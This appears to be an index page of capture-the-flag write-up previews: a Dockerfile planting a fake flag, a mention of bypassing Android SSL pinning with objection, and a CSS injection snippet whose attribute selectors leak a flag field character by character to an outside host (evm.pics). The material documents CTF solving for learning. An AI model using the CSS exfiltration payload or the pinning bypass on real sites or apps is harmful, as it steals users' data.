TFC CTF 2025 Write Up
Slippy (Baby) RUN rand_dir="/$(head /dev/urandom | tr -dc a-z0-9 | head -c 8)"; mkdir "$rand_dir" && echo "TFCCTF{Fake_fLag}" > "$rand_dir/flag.txt" && chmod -R +r "$rand_dir" ...
Slippy (Baby) RUN rand_dir="/$(head /dev/urandom | tr -dc a-z0-9 | head -c 8)"; mkdir "$rand_dir" && echo "TFCCTF{Fake_fLag}" > "$rand_dir/flag.txt" && chmod -R +r "$rand_dir" ...
# (...) ADD flag /flag EXPOSE 80 CMD ["apache2-foreground"] to get the flag, we should trigger rce cuz the flag is in /flag. btw i was working on my job so i have started to solve it a little late...
Signature SSL Pinning before solving this challenge, we have to bypass SSL Pinning, i have bypass via objection Analysis <activity android:theme="@style/Theme.SekaiBank.N...
i joined in justctf 2025 to solve web challs, there were 7 web challs and i aimed to solve Simple Tasks and Positive Players. However Simple Tasks was really difficult that i couldn’t even approach...
Summary input[name=flag][value^=a]{ background: url('https://evm.pics/a'); } input[name=flag][value^=b]{ background: url('https://evm.pics/b'); } /* ... */ In most cases, when exploiting ...